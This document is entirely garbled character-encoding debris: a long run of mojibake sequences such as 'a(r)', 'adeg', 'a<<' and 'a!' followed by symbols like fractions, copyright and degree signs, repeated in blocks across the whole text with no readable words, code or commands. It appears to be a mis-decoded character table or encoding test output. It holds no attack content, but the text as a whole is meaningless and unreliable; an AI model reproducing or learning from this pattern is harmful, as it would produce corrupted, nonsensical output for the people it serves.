a(r)!a(r)C/a(r)PSa(r)$?a(r)Y=a(r)|a(r)SSa(r)"a(r)(c)a(r)aa(r)<<a(r)!a(r)a(r)(r)a(r)-a(r)dega(r)+-a(r)2a(r)3a(r)'a(r)ua(r)Pa(r)*a(r),a(r)1a(r)oa(r)>>a(r)1/4a(r)1/2a(r)3/4a(r)?a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a- a-!a-C/a-PSa-$?a-Y=a-|a-SSa-"a-(c)a-aa-<<a-!a-a-(r)a--a-dega-+-a-2a-3a-'a-ua-Pa-*a-,a-1a-oa->>a-1/4a-1/2a-3/4a-?adegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadeg adeg!adegC/adegPSadeg$?adegY=adeg|adegSSadeg"adeg(c)aa$?aaY=aa|aaSSaa"aa(c)aaaaa<<aa!aaaa(r)aa-aadegaa+-aa2aa3aa'aauaaPaa*aa,aa1aaoaa>>aa1/4aa1/2aa3/4aa?a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<< a<<!a<<C/a<<PSa<<$?a<<Y=a<<|a<<SSa<<"a<<(c)a<<aa<<<<a<<!a<<a<<(r)a<<-a<<dega<<+-a<<2a<<3a<<'a<<ua<<Pa<<*a<<,a<<1a<<oa<<>>a<<1/4a<<1/2a<<3/4a<<?a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a! a!!a!C/a!PSa!$?a!Y=a!|a!SSa!"a!(c)a!aa!<<a!!a!a!(r)a!-a!dega!+-a!2a!3a!'a!ua!Pa!*a!,a!1a!oa!>>a!1/4a!1/2a!3/4a!?aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa a!aC/aPSa$?aY=a|aSSa"a(c)aaa<<a!aa(r)a-adega+-a2a3a'auaPa*a,a1aoa>>a1/4a1/2a3/4a?a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r) a(r)!a(r)C/a(r)PSa(r)$?a(r)Y=a(r)|a(r)SSa(r)"a(r)(c)a(r)aa(r)<<a(r)!a(r)a(r)(r)a(r)-a(r)dega(r)+-a(r)2a(r)3a(r)'a(r)ua(r)Pa(r)*a(r),a(r)1a(r)oa(r)>>a(r)1/4a(r)1/2a(r)3/4a(r)?a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a- a-!a-C/a-PSa-$?a-Y=a-|a-SSa-"a-(c)a-aa-<<a-!a-a-(r)a--a-dega-+-a-2a-3a-'a-ua-Pa-*a-,a-1a-oa->>a-1/4a-1/2a-3/4a-?adegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadeg adeg!adegC/adegPSadeg$?adegY=adeg|adegSSadeg"adeg(c)aa$?aaY=aa|aaSSaa"aa(c)aaaaa<<aa!aaaa(r)aa-aadegaa+-aa2aa3aa'aauaaPaa*aa,aa1aaoaa>>aa1/4aa1/2aa3/4aa?a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<< a<<!a<<C/a<<PSa<<$?a<<Y=a<<|a<<SSa<<"a<<(c)a<<aa<<<<a<<!a<<a<<(r)a<<-a<<dega<<+-a<<2a<<3a<<'a<<ua<<Pa<<*a<<,a<<1a<<oa<<>>a<<1/4a<<1/2a<<3/4a<<?a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a! a!!a!C/a!PSa!$?a!Y=a!|a!SSa!"a!(c)a!aa!<<a!!a!a!(r)a!-a!dega!+-a!2a!3a!'a!ua!Pa!*a!,a!1a!oa!>>a!1/4a!1/2a!3/4a!?aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa a!aC/aPSa$?aY=a|aSSa"a(c)aaa<<a!aa(r)a-adega+-a2a3a'auaPa*a,a1aoa>>a1/4a1/2a3/4a?a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r) a(r)!a(r)C/a(r)PSa(r)$?a(r)Y=a(r)|a(r)SSa(r)"a(r)(c)a(r)aa(r)<<a(r)!a(r)a(r)(r)a(r)-a(r)dega(r)+-a(r)2a(r)3a(r)'a(r)ua(r)Pa(r)*a(r),a(r)1a(r)oa(r)>>a(r)1/4a(r)1/2a(r)3/4a(r)?a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a- a-!a-C/a-PSa-$?a-Y=a-|a-SSa-"a-(c)a-aa-<<a-!a-a-(r)a--a-dega-+-a-2a-3a-'a-ua-Pa-*a-,a-1a-oa->>a-1/4a-1/2a-3/4a-?adegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadeg adeg!adegC/adegPSadeg$?adegY=adeg|adegSSadeg"adeg(c)aa$?aaY=aa|aaSSaa"aa(c)aaaaa<<aa!aaaa(r)aa-aadegaa+-aa2aa3aa'aauaaPaa*aa,aa1aaoaa>>aa1/4aa1/2aa3/4aa?a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<< a<<!a<<C/a<<PSa<<$?a<<Y=a<<|a<<SSa<<"a<<(c)a<<aa<<<<a<<!a<<a<<(r)a<<-a<<dega<<+-a<<2a<<3a<<'a<<ua<<Pa<<*a<<,a<<1a<<oa<<>>a<<1/4a<<1/2a<<3/4a<<?a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a! a!!a!C/a!PSa!$?a!Y=a!|a!SSa!"a!(c)a!aa!<<a!!a!a!(r)a!-a!dega!+-a!2a!3a!'a!ua!Pa!*a!,a!1a!oa!>>a!1/4a!1/2a!3/4a!?aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa a!aC/aPSa$?aY=a|aSSa"a(c)aaa<<a!aa(r)a-adega+-a2a3a'auaPa*a,a1aoa>>a1/4a1/2a3/4a?a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r) a(r)!a(r)C/a(r)PSa(r)$?a(r)Y=a(r)|a(r)SSa(r)"a(r)(c)a(r)aa(r)<<a(r)!a(r)a(r)(r)a(r)-a(r)dega(r)+-a(r)2a(r)3a(r)'a(r)ua(r)Pa(r)*a(r),a(r)1a(r)oa(r)>>a(r)1/4a(r)1/2a(r)3/4a(r)?a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a- a-!a-C/a-PSa-$?a-Y=a-|a-SSa-"a-(c)a-aa-<<a-!a-a-(r)a--a-dega-+-a-2a-3a-'a-ua-Pa-*a-,a-1a-oa->>a-1/4a-1/2a-3/4a-?adegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadeg adeg!adegC/adegPSadeg$?adegY=adeg|adegSSadeg"adeg(c)aa$?aaY=aa|aaSSaa"aa(c)aaaaa<<aa!aaaa(r)aa-aadegaa+-aa2aa3aa'aauaaPaa*aa,aa1aaoaa>>aa1/4aa1/2aa3/4aa?a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<< a<<!a<<C/a<<PSa<<$?a<<Y=a<<|a<<SSa<<"a<<(c)a<<aa<<<<a<<!a<<a<<(r)a<<-a<<dega<<+-a<<2a<<3a<<'a<<ua<<Pa<<*a<<,a<<1a<<oa<<>>a<<1/4a<<1/2a<<3/4a<<?a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a! a!!a!C/a!PSa!$?a!Y=a!|a!SSa!"a!(c)a!aa!<<a!!a!a!(r)a!-a!dega!+-a!2a!3a!'a!ua!Pa!*a!,a!1a!oa!>>a!1/4a!1/2a!3/4a!?aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa a!aC/aPSa$?aY=a|aSSa"a(c)aaa<<a!aa(r)a-adega+-a2a3a'auaPa*a,a1aoa>>a1/4a1/2a3/4a?a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r) a(r)!a(r)C/a(r)PSa(r)$?a(r)Y=a(r)|a(r)SSa(r)"a(r)(c)a(r)aa(r)<<a(r)!a(r)a(r)(r)a(r)-a(r)dega(r)+-a(r)2a(r)3a(r)'a(r)ua(r)Pa(r)*a(r),a(r)1a(r)oa(r)>>a(r)1/4a(r)1/2a(r)3/4a(r)?a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a- a-!a-C/a-PSa-$?a-Y=a-|a-SSa-"a-(c)a-aa-<<a-!a-a-(r)a--a-dega-+-a-2a-3a-'a-ua-Pa-*a-,a-1a-oa->>a-1/4a-1/2a-3/4a-?adegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadeg adeg!adegC/adegPSadeg$?adegY=adeg|adegSSadeg"adeg(c)aa$?aaY=aa|aaSSaa"aa(c)aaaaa<<aa!aaaa(r)aa-aadegaa+-aa2aa3aa'aauaaPaa*aa,aa1aaoaa>>aa1/4aa1/2aa3/4aa?a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<< a<<!a<<C/a<<PSa<<$?a<<Y=a<<|a<<SSa<<"a<<(c)a<<aa<<<<a<<!a<<a<<(r)a<<-a<<dega<<+-a<<2a<<3a<<'a<<ua<<Pa<<*a<<,a<<1a<<oa<<>>a<<1/4a<<1/2a<<3/4a<<?a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a! a!!a!C/a!PSa!$?a!Y=a!|a!SSa!"a!(c)a!aa!<<a!!a!a!(r)a!-a!dega!+-a!2a!3a!'a!ua!Pa!*a!,a!1a!oa!>>a!1/4a!1/2a!3/4a!?aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa a!aC/aPSa$?aY=a|aSSa"a(c)aaa<<a!aa(r)a-adega+-a2a3a'auaPa*a,a1aoa>>a1/4a1/2a3/4a?a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r) a(r)!a(r)C/a(r)PSa(r)$?a(r)Y=a(r)|a(r)SSa(r)"a(r)(c)a(r)aa(r)<<a(r)!a(r)a(r)(r)a(r)-a(r)dega(r)+-a(r)2a(r)3a(r)'a(r)ua(r)Pa(r)*a(r),a(r)1a(r)oa(r)>>a(r)1/4a(r)1/2a(r)3/4a(r)?a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a- a-!a-C/a-PSa-$?a-Y=a-|a-SSa-"a-(c)a-aa-<<a-!a-a-(r)a--a-dega-+-a-2a-3a-'a-ua-Pa-*a-,a-1a-oa->>a-1/4a-1/2a-3/4a-?adegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadeg adeg!adegC/adegPSadeg$?adegY=adeg|adegSSadeg"adeg(c)aa$?aaY=aa|aaSSaa"aa(c)aaaaa<<aa!aaaa(r)aa-aadegaa+-aa2aa3aa'aauaaPaa*aa,aa1aaoaa>>aa1/4aa1/2aa3/4aa?a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<< a<<!a<<C/a<<PSa<<$?a<<Y=a<<|a<<SSa<<"a<<(c)a<<aa<<<<a<<!a<<a<<(r)a<<-a<<dega<<+-a<<2a<<3a<<'a<<ua<<Pa<<*a<<,a<<1a<<oa<<>>a<<1/4a<<1/2a<<3/4a<<?a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a! a!!a!C/a!PSa!$?a!Y=a!|a!SSa!"a!(c)a!aa!<<a!!a!a!(r)a!-a!dega!+-a!2a!3a!'a!ua!Pa!*a!,a!1a!oa!>>a!1/4a!1/2a!3/4a!?aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa a!aC/aPSa$?aY=a|aSSa"a(c)aaa<<a!aa(r)a-adega+-a2a3a'auaPa*a,a1aoa>>a1/4a1/2a3/4a?a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r) a(r)!a(r)C/a(r)PSa(r)$?a(r)Y=a(r)|a(r)SSa(r)"a(r)(c)a(r)aa(r)<<a(r)!a(r)a(r)(r)a(r)-a(r)dega(r)+-a(r)2a(r)3a(r)'a(r)ua(r)Pa(r)*a(r),a(r)1a(r)oa(r)>>a(r)1/4a(r)1/2a(r)3/4a(r)?a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a- a-!a-C/a-PSa-$?a-Y=a-|a-SSa-"a-(c)a-aa-<<a-!a-a-(r)a--a-dega-+-a-2a-3a-'a-ua-Pa-*a-,a-1a-oa->>a-1/4a-1/2a-3/4a-?adegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadeg adeg!adegC/adegPSadeg$?adegY=adeg|adegSSadeg"adeg(c)aa$?aaY=aa|aaSSaa"aa(c)aaaaa<<aa!aaaa(r)aa-aadegaa+-aa2aa3aa'aauaaPaa*aa,aa1aaoaa>>aa1/4aa1/2aa3/4aa?a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<< a<<!a<<C/a<<PSa<<$?a<<Y=a<<|a<<SSa<<"a<<(c)a<<aa<<<<a<<!a<<a<<(r)a<<-a<<dega<<+-a<<2a<<3a<<'a<<ua<<Pa<<*a<<,a<<1a<<oa<<>>a<<1/4a<<1/2a<<3/4a<<?a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a! a!!a!C/a!PSa!$?a!Y=a!|a!SSa!"a!(c)a!aa!<<a!!a!a!(r)a!-a!dega!+-a!2a!3a!'a!ua!Pa!*a!,a!1a!oa!>>a!1/4a!1/2a!3/4a!?aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa a!aC/aPSa$?aY=a|aSSa"a(c)aaa<<a!aa(r)a-adega+-a2a3a'auaPa*a,a1aoa>>a1/4a1/2a3/4a?a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r) a(r)!a(r)C/a(r)PSa(r)$?a(r)Y=a(r)|a(r)SSa(r)"a(r)(c)a(r)aa(r)<<a(r)!a(r)a(r)(r)a(r)-a(r)dega(r)+-a(r)2a(r)3a(r)'a(r)ua(r)Pa(r)*a(r),a(r)1a(r)oa(r)>>a(r)1/4a(r)1/2a(r)3/4a(r)?a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a- a-!a-C/a-PSa-$?a-Y=a-|a-SSa-"a-(c)a-aa-<<a-!a-a-(r)a--a-dega-+-a-2a-3a-'a-ua-Pa-*a-,a-1a-oa->>a-1/4a-1/2a-3/4a-?adegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadeg adeg!adegC/adegPSadeg$?adegY=adeg|adegSSadeg"adeg(c)aa$?aaY=aa|aaSSaa"aa(c)aaaaa<<aa!aaaa(r)aa-aadegaa+-aa2aa3aa'aauaaPaa*aa,aa1aaoaa>>aa1/4aa1/2aa3/4aa?a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<< a<<!a<<C/a<<PSa<<$?a<<Y=a<<|a<<SSa<<"a<<(c)a<<aa<<<<a<<!a<<a<<(r)a<<-a<<dega<<+-a<<2a<<3a<<'a<<ua<<Pa<<*a<<,a<<1a<<oa<<>>a<<1/4a<<1/2a<<3/4a<<?a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a! a!!a!C/a!PSa!$?a!Y=a!|a!SSa!"a!(c)a!aa!<<a!!a!a!(r)a!-a!dega!+-a!2a!3a!'a!ua!Pa!*a!,a!1a!oa!>>a!1/4a!1/2a!3/4a!?aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa a!aC/aPSa$?aY=a|aSSa"a(c)aaa<<a!aa(r)a-adega+-a2a3a'auaPa*a,a1aoa>>a1/4a1/2a3/4a?a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r) a(r)!a(r)C/a(r)PSa(r)$?a(r)Y=a(r)|a(r)SSa(r)"a(r)(c)a(r)aa(r)<<a(r)!a(r)a(r)(r)a(r)-a(r)dega(r)+-a(r)2a(r)3a(r)'a(r)ua(r)Pa(r)*a(r),a(r)1a(r)oa(r)>>a(r)1/4a(r)1/2a(r)3/4a(r)?a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a- a-!a-C/a-PSa-$?a-Y=a-|a-SSa-"a-(c)a-aa-<<a-!a-a-(r)a--a-dega-+-a-2a-3a-'a-ua-Pa-*a-,a-1a-oa->>a-1/4a-1/2a-3/4a-?adegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadeg adeg!adegC/adegPSadeg$?adegY=adeg|adegSSadeg"adeg(c)aa$?aaY=aa|aaSSaa"aa(c)aaaaa<<aa!aaaa(r)aa-aadegaa+-aa2aa3aa'aauaaPaa*aa,aa1aaoaa>>aa1/4aa1/2aa3/4aa?a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<< a<<!a<<C/a<<PSa<<$?a<<Y=a<<|a<<SSa<<"a<<(c)a<<aa<<<<a<<!a<<a<<(r)a<<-a<<dega<<+-a<<2a<<3a<<'a<<ua<<Pa<<*a<<,a<<1a<<oa<<>>a<<1/4a<<1/2a<<3/4a<<?a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a! a!!a!C/a!PSa!$?a!Y=a!|a!SSa!"a!(c)a!aa!<<a!!a!a!(r)a!-a!dega!+-a!2a!3a!'a!ua!Pa!*a!,a!1a!oa!>>a!1/4a!1/2a!3/4a!?aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa a!aC/aPSa$?aY=a|aSSa"a(c)aaa<<a!aa(r)a-adega+-a2a3a'auaPa*a,a1aoa>>a1/4a1/2a3/4a?a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r) a(r)!a(r)C/a(r)PSa(r)$?a(r)Y=a(r)|a(r)SSa(r)"a(r)(c)a(r)aa(r)<<a(r)!a(r)a(r)(r)a(r)-a(r)dega(r)+-a(r)2a(r)3a(r)'a(r)ua(r)Pa(r)*a(r),a(r)1a(r)oa(r)>>a(r)1/4a(r)1/2a(r)3/4a(r)?a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a- a-!a-C/a-PSa-$?a-Y=a-|a-SSa-"a-(c)a-aa-<<a-!a-a-(r)a--a-dega-+-a-2a-3a-'a-ua-Pa-*a-,a-1a-oa->>a-1/4a-1/2a-3/4a-?adegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadeg adeg!adegC/adegPSadeg$?adegY=adeg|adegSSadeg"adeg(c)aa$?aaY=aa|aaSSaa"aa(c)aaaaa<<aa!aaaa(r)aa-aadegaa+-aa2aa3aa'aauaaPaa*aa,aa1aaoaa>>aa1/4aa1/2aa3/4aa?a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<< a<<!a<<C/a<<PSa<<$?a<<Y=a<<|a<<SSa<<"a<<(c)a<<aa<<<<a<<!a<<a<<(r)a<<-a<<dega<<+-a<<2a<<3a<<'a<<ua<<Pa<<*a<<,a<<1a<<oa<<>>a<<1/4a<<1/2a<<3/4a<<?a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a! a!!a!C/a!PSa!$?a!Y=a!|a!SSa!"a!(c)a!aa!<<a!!a!a!(r)a!-a!dega!+-a!2a!3a!'a!ua!Pa!*a!,a!1a!oa!>>a!1/4a!1/2a!3/4a!?aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa a!aC/aPSa$?aY=a|aSSa"a(c)aaa<<a!aa(r)a-adega+-a2a3a'auaPa*a,a1aoa>>a1/4a1/2a3/4a?a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r) a(r)!a(r)C/a(r)PSa(r)$?a(r)Y=a(r)|a(r)SSa(r)"a(r)(c)a(r)aa(r)<<a(r)!a(r)a(r)(r)a(r)-a(r)dega(r)+-a(r)2a(r)3a(r)'a(r)ua(r)Pa(r)*a(r),a(r)1a(r)oa(r)>>a(r)1/4a(r)1/2a(r)3/4a(r)?a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a- a-!a-C/a-PSa-$?a-Y=a-|a-SSa-"a-(c)a-aa-<<a-!a-a-(r)a--a-dega-+-a-2a-3a-'a-ua-Pa-*a-,a-1a-oa->>a-1/4a-1/2a-3/4a-?adegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadeg adeg!adegC/adegPSadeg$?adegY=adeg|adegSSadeg"adeg(c)aa$?aaY=aa|aaSSaa"aa(c)aaaaa<<aa!aaaa(r)aa-aadegaa+-aa2aa3aa'aauaaPaa*aa,aa1aaoaa>>aa1/4aa1/2aa3/4aa?a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<< a<<!a<<C/a<<PSa<<$?a<<Y=a<<|a<<SSa<<"a<<(c)a<<aa<<<<a<<!a<<a<<(r)a<<-a<<dega<<+-a<<2a<<3a<<'a<<ua<<Pa<<*a<<,a<<1a<<oa<<>>a<<1/4a<<1/2a<<3/4a<<?a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a! a!!a!C/a!PSa!$?a!Y=a!|a!SSa!"a!(c)a!aa!<<a!!a!a!(r)a!-a!dega!+-a!2a!3a!'a!ua!Pa!*a!,a!1a!oa!>>a!1/4a!1/2a!3/4a!?aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa a!aC/aPSa$?aY=a|aSSa"a(c)aaa<<a!aa(r)a-adega+-a2a3a'auaPa*a,a1aoa>>a1/4a1/2a3/4a?a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r) a(r)!a(r)C/a(r)PSa(r)$?a(r)Y=a(r)|a(r)SSa(r)"a(r)(c)a(r)aa(r)<<a(r)!a(r)a(r)(r)a(r)-a(r)dega(r)+-a(r)2a(r)3a(r)'a(r)ua(r)Pa(r)*a(r),a(r)1a(r)oa(r)>>a(r)1/4a(r)1/2a(r)3/4a(r)?a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a- a-!a-C/a-PSa-$?a-Y=a-|a-SSa-"a-(c)a-aa-<<a-!a-a-(r)a--a-dega-+-a-2a-3a-'a-ua-Pa-*a-,a-1a-oa->>a-1/4a-1/2a-3/4a-?adegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadeg adeg!adegC/adegPSadeg$?adegY=adeg|adegSSadeg"adeg(c)aa$?aaY=aa|aaSSaa"aa(c)aaaaa<<aa!aaaa(r)aa-aadegaa+-aa2aa3aa'aauaaPaa*aa,aa1aaoaa>>aa1/4aa1/2aa3/4aa?a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<< a<<!a<<C/a<<PSa<<$?a<<Y=a<<|a<<SSa<<"a<<(c)a<<aa<<<<a<<!a<<a<<(r)a<<-a<<dega<<+-a<<2a<<3a<<'a<<ua<<Pa<<*a<<,a<<1a<<oa<<>>a<<1/4a<<1/2a<<3/4a<<?a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a! a!!a!C/a!PSa!$?a!Y=a!|a!SSa!"a!(c)a!aa!<<a!!a!a!(r)a!-a!dega!+-a!2a!3a!'a!ua!Pa!*a!,a!1a!oa!>>a!1/4a!1/2a!3/4a!?aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa a!aC/aPSa$?aY=a|aSSa"a(c)aaa<<a!aa(r)a-adega+-a2a3a'auaPa*a,a1aoa>>a1/4a1/2a3/4a?a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r) a(r)!a(r)C/a(r)PSa(r)$?a(r)Y=a(r)|a(r)SSa(r)"a(r)(c)a(r)aa(r)<<a(r)!a(r)a(r)(r)a(r)-a(r)dega(r)+-a(r)2a(r)3a(r)'a(r)ua(r)Pa(r)*a(r),a(r)1a(r)oa(r)>>a(r)1/4a(r)1/2a(r)3/4a(r)?a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a- a-!a-C/a-PSa-$?a-Y=a-|a-SSa-"a-(c)a-aa-<<a-!a-a-(r)a--a-dega-+-a-2a-3a-'a-ua-Pa-*a-,a-1a-oa->>a-1/4a-1/2a-3/4a-?adegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadeg 